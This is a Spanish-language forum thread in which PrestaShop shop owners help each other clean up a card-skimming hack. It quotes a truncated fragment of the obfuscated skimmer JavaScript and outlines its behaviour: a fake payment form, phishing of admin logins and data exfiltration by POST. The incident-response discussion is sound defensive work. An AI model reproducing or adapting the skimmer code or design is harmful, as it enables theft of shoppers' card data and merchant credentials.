jromangmail2023 Posted April 29, 2023 Share Posted April 29, 2023 Buenos d铆as, seguramente este problema ya ha sido reportado en varias ocasiones pero no logro dar con la soluci贸n Hace aproximadamente 6 meses nos hackearon la tienda en prestahop 1.7 con los archivo php.unit, realizamos la limpieza ccorrespondiente pero cuando accedes a la p谩gina del carrito en la parte final del HTML aparece el siguiente script var _0x5aa5=["\x62\x6E\x70\x6D\x65\x72\x63\x61\x6E\x65\x74\x63\x77\x5F\x63\x6F\x6E\x74\x65\x6E\x74","\x70\x61\x79\x2D\x77\x69\x74\x68\x2D\x70\x61\x79\x6D\x65\x6E\x74\x2D\x6F\x70\x74\x69\x6F\x6E\x2D\x34\x2D\x66\x6F\x72\x6D","\x70\x61\x79\x2D\x77\x69\x74\x68\x2D\x70\x61\x79\x6D\x65\x6E\x74\x2D\x6F\x70\x74\x69\x6F\x6E\x2D\x33\x2D\x66\x6F\x72\x6D","\x70\............... Perdon por lo largo que es LLevo meses buscando una solucci贸n a este asunto ya que cuando voy a pagar me est谩 saltando un formulario falso para poner la tarjeta, adjunto pantallazo No se si alguien me puede oriemntar un poco m谩s porque me estoy quedando sin ideas y es una transtorno bastante serio Os agradeceria culquier luz que me podais dar Muchas gracias Link to comment Share on other sites More sharing options...
ComGrafPL Posted April 29, 2023 Share Posted April 29, 2023 驴Has le铆do esto? Podr铆a ayudar a limpiarlo https://www.prestashop.com/forums/topic/1067200-hack-prestashop-sur-la-page-de-paiement-nettoyage/ 1 Link to comment Share on other sites More sharing options...
decimoarte Posted April 29, 2023 Share Posted April 29, 2023 hace 10 minutos, ComGrafPL dijo: 驴Has le铆do esto? Podr铆a ayudar a limpiarlo https://www.prestashop.com/forums/topic/1067200-hack-prestashop-sur-la-page-de-paiement-nettoyage/ Gracias聽 Voy a ver, entiendo que es de fiar el script... No sea que la liemos m谩s, jjejejeje Link to comment Share on other sites More sharing options...
Nickz Posted April 29, 2023 Share Posted April 29, 2023 1 hour ago, jromangmail2023 said: Hace aproximadamente 6 meses nos hackearon la tienda en prestahop 1.7 con los archivo php.unit, realizamos la limpieza ccorrespondiente pero cuando accedes a la p谩gina del carrito en la parte final del HTML aparece el siguiente script Mejor hacer la Tienda nueva. Donde estan hospeadas? Link to comment Share on other sites More sharing options...
decimoarte Posted April 29, 2023 Share Posted April 29, 2023 hace 17 minutos, Nickz dijo: Mejor hacer la Tienda nueva. Donde estan hospeadas? 聽 Link to comment Share on other sites More sharing options...
jromangmail2023 Posted April 29, 2023 Author Share Posted April 29, 2023 5 hours ago, Nickz said: Mejor hacer la Tienda nueva. Donde estan hospeadas? Est谩 en IONOS聽 聽 Link to comment Share on other sites More sharing options...
Nickz Posted April 30, 2023 Share Posted April 30, 2023 21 hours ago, jromangmail2023 said: Est谩 en IONOS聽 verifica tu access.log, si hay sospecha que tu hosting tiene que ver buscate un VPS. Tengo mala experiencia con los mega Hosting.聽 聽 Link to comment Share on other sites More sharing options...
Fabry Posted April 30, 2023 Share Posted April 30, 2023 On 4/29/2023 at 12:10 PM, jromangmail2023 said: Buenos d铆as, seguramente este problema ya ha sido reportado en varias ocasiones pero no logro dar con la soluci贸n Hace aproximadamente 6 meses nos hackearon la tienda en prestahop 1.7 con los archivo php.unit, realizamos la limpieza ccorrespondiente pero cuando accedes a la p谩gina del carrito en la parte final del HTML aparece el siguiente script var _0x5aa5=["\x62\x6E\x70\x6D\x65\x72\x63\x61\x6E\x65\x74\x63\x77\x5F\x63\x6F\x6E\x74\x65\x6E\x74","\x70\x61\x79\x2D\x77\x69\x74\x68\x2D\x70\x61\x79\x6D\x65\x6E\x74\x2D\x6F\x70\x74\x69\x6F\x6E\x2D\x34\x2D\x66\x6F\x72\x6D","\x70\x61\x79\x2D\x77\x69\x74\x68\x2D\x70\x61\x79\x6D\x65\x6E\x74\x2D\x6F\x70\x74\x69\x6F\x6E\x2D\x33\x2D\x66\x6F\x72\x6D","\x70\............... Perdon por lo largo que es LLevo meses buscando una solucci贸n a este asunto ya que cuando voy a pagar me est谩 saltando un formulario falso para poner la tarjeta, adjunto pantallazo No se si alguien me puede oriemntar un poco m谩s porque me estoy quedando sin ideas y es una transtorno bastante serio Os agradeceria culquier luz que me podais dar Muchas gracias 聽 Hola! 聽 Recientemente tuve algunas tiendas donde alteraron este archivo inyectando un c贸digo como el que indicaste /vendor/composer/autoreal.php el archivo original suele tener un tama帽o de 2.7k/2.8k..si lo ves diferente abrelo y comprueba.....el archivo debe ser reemplazado por una copia de seguridad de tu instalacion y no por cualquier prestashop porque tiene un cierto c贸digo interior diferente de cada instalaci贸n. Ps:隆Perdonad mi espa帽ol no muy correcto! Ciao Fabrizio Link to comment Share on other sites More sharing options...
jromangmail2023 Posted April 30, 2023 Author Share Posted April 30, 2023 12 minutes ago, Fabry said: 聽 Hola! 聽 Recientemente tuve algunas tiendas donde alteraron este archivo inyectando un c贸digo como el que indicaste /vendor/composer/autoreal.php el archivo original suele tener un tama帽o de 2.7k/2.8k..si lo ves diferente abrelo y comprueba.....el archivo debe ser reemplazado por una copia de seguridad de tu instalacion y no por cualquier prestashop porque tiene un cierto c贸digo interior diferente de cada instalaci贸n. Ps:隆Perdonad mi espa帽ol no muy correcto! Ciao Fabrizio Muchas gracias por la aclaraci贸n.. voy a probar... Y tu espa帽ol perfecto Os digo algo聽 Gracias de nuevo聽 Link to comment Share on other sites More sharing options...
jromangmail2023 Posted April 30, 2023 Author Share Posted April 30, 2023 1 hour ago, Nickz said: verifica tu access.log, si hay sospecha que tu hosting tiene que ver buscate un VPS. Tengo mala experiencia con los mega Hosting.聽 聽 Gracias聽 Lo comprobar茅聽 Ya te comentar茅聽 Un saludo聽 Link to comment Share on other sites More sharing options...
ExpertoPrestaShop Posted May 1, 2023 Share Posted May 1, 2023 Este hackeo modifica ficheros del n煤cleo de PS para incluir este c贸digo malicioso. Busca en tu BackOffice Par谩metros Avanzados -> Informaci贸n ->聽Listado de聽archivos modificados y all铆 encontrar谩s todos los archivos afectados. Con sobrescribirlos restaur谩ndolos a la version original de PS ya deber铆a desaparecer el problema. PERO eso no evitar谩 que vuelvan a hackearte la tienda, porque probablemente entraron a trav茅s de alguna vulnerabilidad de un modulo obsoleto. Link to comment Share on other sites More sharing options...
jromangmail2023 Posted May 1, 2023 Author Share Posted May 1, 2023 11 hours ago, ExpertoPrestaShop said: Este hackeo modifica ficheros del n煤cleo de PS para incluir este c贸digo malicioso. Busca en tu BackOffice Par谩metros Avanzados -> Informaci贸n ->聽Listado de聽archivos modificados y all铆 encontrar谩s todos los archivos afectados. Con sobrescribirlos restaur谩ndolos a la version original de PS ya deber铆a desaparecer el problema. PERO eso no evitar谩 que vuelvan a hackearte la tienda, porque probablemente entraron a trav茅s de alguna vulnerabilidad de un modulo obsoleto. No se c贸mo agraderte el cable que me has lanzado He seguido tus indicaciones y se solucion贸, por si a alguien le sirve de ayuda, este fue mi reporter de archivos modificados聽 robots.txt classes/Carrier.php classes/Customer.php classes/Dispatcher.php classes/Employee.php classes/Hook.php classes/Link.php classes/Product.php classes/Store.php classes/Tools.php classes/controller/Controller.php classes/controller/FrontController.php classes/controller/ModuleFrontController.php classes/helper/HelperList.php classes/shop/Shop.php config/smarty.config.inc.php controllers/admin/AdminLoginController.php controllers/front/AuthController.php controllers/front/IndexController.php controllers/front/ProductController.php src/PrestaShopBundle/Install/Install.php Pues bien, subiendo los mismos archivos de una versi贸n similar todo volvi贸 a su ser De nuevo muchas gracias, ahora me toca analizar posibles fallas de seguridad en alg煤n m贸dulo o algo..聽 Que tengas un gran d铆a 聽 聽 Link to comment Share on other sites More sharing options...
ExpertoPrestaShop Posted May 1, 2023 Share Posted May 1, 2023 Tienes que revisar los access logs de tu tienda para intentar encontrar desde que IP te escanearon la web y que archivos revisaron para entrar y hacer el hackeo. Otra detalle, este hackeo "vigila" las contrase帽as de empleados, as铆 que cualquiera que haya accedido al BackOffice en estos d铆as deber铆a cambiar su contrase帽a urgentemente. Link to comment Share on other sites More sharing options...
pascualandres01 Posted May 2, 2023 Share Posted May 2, 2023 (edited) Pues parece ser que estan entrando en varias..聽 聽como bloqueais para que no vuelvan a entrar? hay algun firewall?聽 聽 Edited May 2, 2023 by pascualandres01 (see edit history) Link to comment Share on other sites More sharing options...
Nickz Posted May 2, 2023 Share Posted May 2, 2023 20 hours ago, jromangmail2023 said: este fue mi reporter de archivos modificados聽 Te toca rehacer tu tienda. Aprovecha y mejorala despu茅s de haber encontrado la entrada y haberla tapada. . Link to comment Share on other sites More sharing options...
ExpertoPrestaShop Posted May 2, 2023 Share Posted May 2, 2023 7 hours ago, pascualandres01 said: Pues parece ser que estan entrando en varias..聽 聽como bloqueais para que no vuelvan a entrar? hay algun firewall?聽 聽 Cloudflare que es gratis. Bloqueas el acceso a todos los pa铆ses distintos al tuyo y con eso deber铆a bastar. Aunque la soluci贸n es actualizar/eliminar los m贸dulos con problemas. Link to comment Share on other sites More sharing options...
pascualandres01 Posted May 2, 2023 Share Posted May 2, 2023 Hola, si cloudflare lo conozco, lo tenemos activado para asia, pero europa y eeuu no podemos tenerlo activado ya que entran y compran a trav茅s de web... el tema de los m贸dulos los hemos actualizado, pero hay algo que se me escapa, estoy buscando por log a ver... la web esta actualizada a la versi贸n 1.7.8.9... Link to comment Share on other sites More sharing options...
Nickz Posted May 2, 2023 Share Posted May 2, 2023 4 hours ago, ExpertoPrestaShop said: Cloudflare que es gratis. Puede ser pero te va bloquear clientes y hasta a ti mismo. Cloud es una desventaja, entregas el control de tu tienda a la cloud. Link to comment Share on other sites More sharing options...
jromangmail2023 Posted May 2, 2023 Author Share Posted May 2, 2023 12 hours ago, pascualandres01 said: Pues parece ser que estan entrando en varias..聽 聽como bloqueais para que no vuelvan a entrar? hay algun firewall?聽 聽 A lo mejor si como me han comentado tienes la posibilidad de chequear el log para ver las IP'S que consideres extra帽as podr铆as bloquearlas desde el htacces, a parte aqu铆 tienes un m贸dulo que hace esa funci贸n, no lo he probado pero navegando en el foro hacen referencia a el y no pinta mal... https://dh42.com/free-prestashop-modules/prestashop-htaccess-module/# Ya me contar谩s聽 Un saludo聽 Link to comment Share on other sites More sharing options...
Jonnathan Posted May 2, 2023 Share Posted May 2, 2023 Hola tambien fui vicitima del mismo hackeo, me toco montar la tienda nuevamente, lo que no se como identificar es cual modulo es el vulnerable. Por lo que veo fue un hack masivo Link to comment Share on other sites More sharing options...
jromangmail2023 Posted May 3, 2023 Author Share Posted May 3, 2023 5 hours ago, Jonnathan said: Hola tambien fui vicitima del mismo hackeo, me toco montar la tienda nuevamente, lo que no se como identificar es cual modulo es el vulnerable. Por lo que veo fue un hack masivo Hola, pues ya ser铆a una paliza no? Con respecto a los m贸dulos que se pueden ver afectados m铆rate esto https://www.lineagrafica.es/seguridad-prestashop-vulnerabilidad-malware/ Quizas te oriente un poco聽 Espero que tengas suerte聽 Un saludo聽 1 Link to comment Share on other sites More sharing options...
bera_ramazan Posted May 3, 2023 Share Posted May 3, 2023 Despu茅s de realizar una copia de seguridad de la base de datos, elimine todos los archivos y vuelva a instalarla. Link to comment Share on other sites More sharing options...
Jonnathan Posted May 3, 2023 Share Posted May 3, 2023 6 hours ago, jromangmail2023 said: Hola, pues ya ser铆a una paliza no? Con respecto a los m贸dulos que se pueden ver afectados m铆rate esto https://www.lineagrafica.es/seguridad-prestashop-vulnerabilidad-malware/ Quizas te oriente un poco聽 Espero que tengas suerte聽 Un saludo聽 Gracias por la info聽馃槈 Realice la limpieza en mi nuevo sitio pero me parece raro que teniendo una versi贸n limpia y reciente del prestashop este sea vulnerable Prestashop 1.7.8.9 Les dejo por ac谩 lo que encontre root@23hg4234hg3:/storage/prestashop/html# find /storage/prestashop/html/ -type d -iname phpunit /storage/prestashop/html/modules/ps_facebook/vendor/phpunit /storage/prestashop/html/modules/psxmarketingwithgoogle/vendor/phpunit /storage/prestashop/html/vendor/symfony/symfony/src/Symfony/Bridge/PhpUnit /storage/prestashop/html/vendor/doctrine/deprecations/lib/Doctrine/Deprecations/PHPUnit Elimine todos los directorios phpunit a exepci贸n del聽html/vendor/symfony/symfony/src/Symfony/Bridge/PhpUnit como lo indican en la documentaci贸n聽 https://build.prestashop-project.org/news/2020/critical-security-vulnerability-in-prestashop-modules/ 聽 Link to comment Share on other sites More sharing options...
jromangmail2023 Posted May 3, 2023 Author Share Posted May 3, 2023 20 minutes ago, Jonnathan said: Gracias por la info聽馃槈 Realice la limpieza en mi nuevo sitio pero me parece raro que teniendo una versi贸n limpia y reciente del prestashop este sea vulnerable Prestashop 1.7.8.9 Les dejo por ac谩 lo que encontre root@23hg4234hg3:/storage/prestashop/html# find /storage/prestashop/html/ -type d -iname phpunit /storage/prestashop/html/modules/ps_facebook/vendor/phpunit /storage/prestashop/html/modules/psxmarketingwithgoogle/vendor/phpunit /storage/prestashop/html/vendor/symfony/symfony/src/Symfony/Bridge/PhpUnit /storage/prestashop/html/vendor/doctrine/deprecations/lib/Doctrine/Deprecations/PHPUnit Elimine todos los directorios phpunit a exepci贸n del聽html/vendor/symfony/symfony/src/Symfony/Bridge/PhpUnit como lo indican en la documentaci贸n聽 https://build.prestashop-project.org/news/2020/critical-security-vulnerability-in-prestashop-modules/ 聽 No es raro, ya que estos archivos acceden a trav茅s de una vulnerabilidad c贸mo has podido comprobar, pero vamos, sita has realizado la limpieza esperemos que no se aburran... Si encuentras algo m谩s h谩zmelo saber para chequear yo la m铆a聽 Estamos en contacto Un saludo聽 Link to comment Share on other sites More sharing options...
ExpertoPrestaShop Posted May 3, 2023 Share Posted May 3, 2023 18 hours ago, Nickz said: Puede ser pero te va bloquear clientes y hasta a ti mismo. Cloud es una desventaja, entregas el control de tu tienda a la cloud. En la vida hab铆a escuchado una opinion tan disruptiva聽馃槅聽Por si gustas aprender poquito mas del tema:聽https://youtu.be/g2qR2YY4kGw 聽 Link to comment Share on other sites More sharing options...
Nickz Posted May 3, 2023 Share Posted May 3, 2023 1 hour ago, ExpertoPrestaShop said: En la vida hab铆a escuchado una opinion tan disruptiva聽馃槅 Tengo m谩s que 18 a帽os en este medio. 2 Link to comment Share on other sites More sharing options...
ExpertoPrestaShop Posted July 3, 2023 Share Posted July 3, 2023 聽 Link to comment Share on other sites More sharing options...
Hue2 Posted July 4, 2023 Share Posted July 4, 2023 Hola, Quiero esclarecer alguna cosa por aqu铆 ya que creo que puedo dar respuesta a algunos puntos, debido a que parte de mis funciones recaen en la seguridad. 1. Nos encontramos ante un ataque XSS. Es importante comprender que muchas veces no vale con actualizar la tienda ya que suelen ser los m贸dulos los que tienen estas debilidades y permiten la inyecci贸n de c贸digo. 2. Es vital comprender por donde han accedido聽 por ello podemos tratar de mirar la fecha de modificaci贸n de los ficheros para tener una hora aproximada de los ataques. Filtra los logs de acceso con las peticiones POST que han tenido 茅xito (c贸digo 200), suelen haber peticiones muy seguidas a los ficheros afectados. Suelen usar lo que se denominan diccionarios que no es otra cosa que una lista con ficheros conocidos que contienen la vulnerabilidad, seguramente encontraras varias peticiones a ficheros que no existen y que les devuelve un 404.聽 3. Inf贸rmate de los m贸dulos que encuentres como sospechosos, es probable que exista un CVE reportado. 4. Actualiza o des-instala el m贸dulo afectado, dependiendo de tus necesidades.聽 Aclaro un par de cosas m谩s: Cloudflare puede ser una buena medida de seguridad ya que pone un servidor entre el tuyo y los usuarios, por lo que el escaneo de t煤 maquina se complica bastante. Esta suele ser una soluci贸n a dolores de cabeza como trafico innecesario. Adem谩s viene con su certificado SSL, por lo que si has prescindido de 茅l en t煤 m谩quina cloudflare lo hace por ti. Es cierto que tiene algunas pegas pero que si las conoces y sabes lidiar con ello al final no es para tanto. Estoy estudiando el c贸digo malicioso ya que a帽ade m谩s cosa de lo que parece. No tengo claro que es lo que has usado para detectar los archivos, pero con la informaci贸n del backoffice no te bastara ya que comprueba los archivos nativos de prestashop, la inyecci贸n a帽ade archivos que no forman parte y por ende estos no se ver谩n reflejados. Aunque ya he podido leer la mayor铆a del c贸digo ofuscado puedo trasladar unos conceptos generales de lo que hace el c贸digo: * Los usuarios del backoffice que inicien sesi贸n durante el tiempo que la tienda ha estado comprometida tienen comprometidos sus datos ya que realiza phishing del mail, contrase帽a e incluso del directorio del backoffice. *A帽aden una imagen codificada que no es m谩s que un script de js que a帽ade un m茅todo de pago, el mismo que has mostrado. Como dato curioso parece que esta basado en el m贸dulo de mercanet. aunque modificado claro, preserva alguna clase con el nombre del m贸dulo. Aunque no es importante hay nombres de variables que pertenecen con ascii unicode a caracteres chinos, pero me parece curioso comentarlo. *Recuperan la informaci贸n mediante curl, haciendo un POST con unos token espec铆ficos. *El c贸digo malicioso esta enfocado a tres tecnolog铆as distintas por llamarlo de alguna forma: PrestaShop, Magento y aparentemente Nextcloud, este 煤ltimo no lo tengo claro a煤n. Ya que hace una consulta a la tabla employee de prestashop, admin_user de Magento y oc_user, Nextcloud parece usar una tabla que se llama as铆. De hecho un archivo que a帽aden esta en el directorio app que se llama Mage.php este es un archivo usado en Magento en ese mismo directorio.聽 No quiero alargar esto demasiado, espero finalizar la interpretaci贸n del c贸digo que inyectan pronto, de momento queda claro que renovar las contrase帽as de los usuarios del back y renovar el nombre del back por otro como medida urgente.聽 Un saludo Link to comment Share on other sites More sharing options...
Nickz Posted July 4, 2023 Share Posted July 4, 2023 (edited) On 7/4/2023 at 5:34 AM, Hue2 said: No quiero alargar esto demasiado, espero finalizar la interpretaci贸n del c贸digo que inyectan pronto, Unica forma efectiva de evitar es validar los campos de contacto. Si un Modulo muestra debilidad deshabilitalo y encuentra una solucion 聽 Edited November 9, 2023 by Nickz (see edit history) Link to comment Share on other sites More sharing options...
prestaconfig Posted November 6, 2023 Share Posted November 6, 2023 Buenos dias, Tambi茅n tenemos el caso del hack que modifica peri贸dicamente el archivo /vendor/composer/autoload_real.php. 驴Tiene una soluci贸n para evitar la modificaci贸n de este archivo o para detectar modificaciones en este archivo? Esto es lo que se prob贸: - Cambiar permisos de escritura (esto no es suficiente) - Parchear Prestashop con los 煤ltimos CVE (esto no es suficiente). - Uso del script eolia (esto no es suficiente) Versi贸n de Prestashop: 1.7.8.9 Versi贸n de PHP: 7.4 Gracias. Link to comment Share on other sites More sharing options...
Jonnathan Posted November 8, 2023 Share Posted November 8, 2023 Al momento del hackeo cree este script para monitorear archivos nuevos y modificados mediante hash, espero les sirva聽鉁岋笍 聽 1 Link to comment Share on other sites More sharing options...
prestaconfig Posted November 9, 2023 Share Posted November 9, 2023 Buenos dias, 隆Gracias por este recurso! Buen dia. Link to comment Share on other sites More sharing options...
.png.022b5452a8f28f552bc9430097a16da2.png)
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now